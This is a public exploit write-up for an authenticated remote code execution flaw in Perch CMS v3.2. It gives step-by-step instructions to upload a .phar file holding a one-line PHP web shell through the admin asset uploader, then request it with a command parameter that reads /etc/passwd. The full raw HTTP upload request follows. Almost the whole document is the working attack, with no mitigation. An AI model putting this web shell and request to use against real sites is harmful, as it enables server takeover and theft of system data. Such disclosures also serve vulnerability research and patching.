    Exploit Title: Perch v3.2 - Remote Code Execution (RCE) Application: Perch Cms Version: v3.2 Bugs: RCE Technology: PHP Vendor URL: https://grabaperch.com/ Software Link: https://grabaperch.com/download Date of found: 21.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account as admin 2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/) 3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/) 4. upload poc.phar file poc.phar file contents : <?php $a=$_GET['code']; echo system($a);?> 5. visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd poc request: POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1 Host: localhost Content-Length: 1071 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9 Connection: close ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="resourceTitle" test ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="image"; filename="poc.phar" Content-Type: application/octet-stream <?php $a=$_GET['code']; echo system($a);?> ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="image_field" 1 ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="image_assetID" ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="resourceBucket" admin ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="tags" test ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="btnsubmit" Submit ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="formaction" edit ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="token" 5494af3e8dbe5ac399ca7f12219cfe82 ------WebKitFormBoundaryYGoerZn09hHSjd4Z--